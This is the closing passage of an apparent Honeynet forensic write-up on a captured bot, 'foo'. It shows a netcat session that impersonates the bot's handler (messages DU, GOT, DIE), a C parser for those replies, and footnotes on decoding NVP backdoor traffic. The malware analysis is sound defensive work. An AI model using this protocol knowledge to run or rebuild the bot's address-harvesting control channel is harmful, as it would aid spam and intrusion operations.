1076@whatever.com    *
1077@whatever.com    *
1078@whatever.com    *
1079@whatever.com    *
1080@whatever.com    *
1081@whatever.com    *
1082@whatever.com    *
1083@whatever.com    *
1084@whatever.com    *
GOT                  -> I respond saying "I got the addresses"
GU                   <- foo asks for the next Uin
DIE                  -> I tell him it is time to die
sent 15, rcvd 233
peloy@canaima:/tmp$ ps aux | grep nfs         # confirm that foo died
peloy@canaima:/tmp$                           # it did :)
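The three handler messages typed in the session above ("DU" followed by a number, "GOT" and "DIE") are simple enough that classifying them takes only a few lines. The sketch below is an illustration based solely on that session: the enum, the function name and the tolerance for a trailing newline (netcat sends one) are my assumptions, and foo.c may well handle replies differently.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical names for the handler messages seen in the session. */
enum handler_reply { REPLY_UNKNOWN, REPLY_UIN, REPLY_GOT, REPLY_DIE };

/*
 * Classify a message received from the handler. For "DU<number>" the
 * number is stored in *uin. Anything after the recognized prefix, such
 * as a trailing newline, is ignored.
 */
enum handler_reply parse_handler_reply(const char *msg, unsigned long *uin)
{
    assert(msg != NULL && uin != NULL);
    if (strncmp(msg, "DU", 2) == 0) {
        if (msg[2] < '0' || msg[2] > '9')
            return REPLY_UNKNOWN;           /* "DU" without a number */
        *uin = strtoul(msg + 2, NULL, 10);
        return REPLY_UIN;
    }
    if (strncmp(msg, "GOT", 3) == 0)
        return REPLY_GOT;
    if (strncmp(msg, "DIE", 3) == 0)
        return REPLY_DIE;
    return REPLY_UNKNOWN;
}
```

With this, the reply "DU1073" from the session would yield REPLY_UIN with the value 1073, after which the sweep would start at Uin 1073.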
Footnotes
[1] I reverse-engineered the-binary from the Reverse Challenge. However, I could not finish in time so I didn't make a submission. My work with the-binary definitely helped me to understand some of the most important points of this Scan of the Month.
[2] The dump.c program, which decodes NVP backdoor traffic, was written specifically for Scan of the Month 22, not during my work on the Reverse Challenge.